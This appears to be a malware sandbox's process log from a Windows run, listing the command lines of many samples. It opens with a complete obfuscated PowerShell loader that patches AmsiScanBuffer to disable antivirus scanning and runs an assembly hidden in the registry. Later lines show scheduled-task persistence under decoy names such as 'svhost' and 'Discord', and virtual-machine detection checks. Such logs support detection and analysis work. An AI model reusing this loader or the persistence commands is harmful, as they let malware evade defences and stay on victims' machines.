C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:eYxrkBgfPWtB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mqPvfiVZWPJRjr,[Parameter(Position=1)][Type]$mpQFhykSbP)$jIppYFpwEhi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Refl'+'e'+''+'c'+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'el'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+'D'+'e'+'leg'+'a'+'te'+'T'+''+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+','+'S'+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+'n'+'s'+''+[Char](105)+'C'+'l'+'a'+'s'+''+'s'+',A'+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$jIppYFpwEhi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+[Char](99)+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+'i'+'g'+','+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$mqPvfiVZWPJRjr).SetImplementationFlags('R'+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+','+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+'ed');$jIppYFpwEhi.DefineMethod(''+'I'+'nv'+'o'+'k'+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+','+'H'+'i'+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+'i'+'g'+[Char](44)+''+'N'+'e'+[Char](119)+''+[Char](83)+'lo'+'t'+''+','+'V'+[Char](105)+'rt'+'u'+'a'+[Char](108)+'',$mpQFhykSbP,$mqPvfiVZWPJRjr).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+'ime'+','+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $jIppYFpwEhi.CreateType();}$AwvzxgReJitYU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+'.'+''+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+'c'+[Char](114)+'o'+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+'W'+'i'+[Char](110)+''+'3'+'2'+'.'+''+[Char](85)+''+[Char](110)+'s'+[Char](97)+'fe'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$QYVgjFKiADBKpP=$AwvzxgReJitYU.GetMethod(''+'G'+''+[Char](101)+'t'+[Char](80)+''+'r'+'oc'+'A'+''+'d'+''+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$XuRSdepCyIHsseQFTlK=eYxrkBgfPWtB @([String])([IntPtr]);$frMFLkiRfMTXoGuBloAVuT=eYxrkBgfPWtB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XLkjeedKkrZ=$AwvzxgReJitYU.GetMethod(''+[Char](71)+'etMo'+[Char](100)+''+'u'+''+'l'+''+[Char](101)+'H'+'a'+'n'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+''+[Char](51)+''+[Char](50)+'.'+[Char](100)+'ll')));$ZMoanjlXjbTSRq=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object]('L'+[Char](111)+'a'+[Char](100)+''+[Char](76)+'i'+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+'y'+[Char](65)+'')));$JJEwvHNtPEjoRYuON=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$XLkjeedKkrZ,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+[Char](101)+''+[Char](99)+'t')));$EwGuUkl=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZMoanjlXjbTSRq,$XuRSdepCyIHsseQFTlK).Invoke('a'+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$XvjloYXHHsDbZEtcY=$QYVgjFKiADBKpP.Invoke($Null,@([Object]$EwGuUkl,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+'i'+''+'S'+''+'c'+'anB'+[Char](117)+''+[Char](102)+''+'f'+''+'e'+''+[Char](114)+'')));$ssvSumgWpx=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,4,[ref]$ssvSumgWpx);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$XvjloYXHHsDbZEtcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JJEwvHNtPEjoRYuON,$frMFLkiRfMTXoGuBloAVuT).Invoke($XvjloYXHHsDbZEtcY,[uint32]8,0x20,[ref]$ssvSumgWpx);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+[Char](84)+''+'W'+''+'A'+''+'R'+''+'E'+'').GetValue('$'+'7'+''+[Char](55)+''+[Char](115)+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KeBeUxMxt5rs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{2f5dd3e4-d53d-410e-b3fd-fc4b177ea6d0}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77Security" /tr "C:\Users\Admin\AppData\Roaming\$77Security.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Fg8OiSm2W9aH.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\srtware.exe

"C:\Users\Admin\Desktop\Files\srtware.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 2060 -ip 2060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2060 -s 84

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\0gCc6gLqbZ4p.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OSFpz9bh9GZK.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qgDm2GH1LKVy.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 596 -p 2408 -ip 2408

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2408 -s 312

C:\Users\Admin\Desktop\Files\Pichon.exe

"C:\Users\Admin\Desktop\Files\Pichon.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkORHBv6MEkT.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\Desktop\Files\TCP.exe

"C:\Users\Admin\Desktop\Files\TCP.exe"

C:\Users\Admin\Desktop\Files\c3.exe

"C:\Users\Admin\Desktop\Files\c3.exe"

C:\Users\Admin\Desktop\Files\winlog32.exe

"C:\Users\Admin\Desktop\Files\winlog32.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Users\Admin\Desktop\Files\TPB-1.exe

"C:\Users\Admin\Desktop\Files\TPB-1.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5332 -ip 5332

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5332 -s 860

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rYhDRPD5vi3w.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 552 -p 3144 -ip 3144

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3144 -s 344

C:\Windows\System32\NOTEPAD.EXE

"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Loli169.bat

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 632 -p 5260 -ip 5260

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 5260 -s 352

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hY3WriDIaW8q.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QqQGkUhifzGh.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OGro20IwsaQZ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\Desktop\Files\MajesticExec.exe

"C:\Users\Admin\Desktop\Files\MajesticExec.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\q52y8mMUPLgh.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\Desktop\Files\qNVQKFyM.exe

"C:\Users\Admin\Desktop\Files\qNVQKFyM.exe"

C:\Users\Admin\Desktop\Files\svc.exe

"C:\Users\Admin\Desktop\Files\svc.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d4V2EwdrqlEs.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eDlbxk1R5dLM.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /0

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fnaDQMRBOCPz.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\Loli169.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\Loli169.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get Model

C:\Windows\system32\findstr.exe

findstr /i "DADY HARDDISK QEMU HARDDISK WDC WDS100T2B0A"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\9YDL858ngq4B.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Users\Admin\AppData\Roaming\$77Security.exe

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\TuGrPuBdKTPZ.bat"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IrF6CLU8JxbY.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe

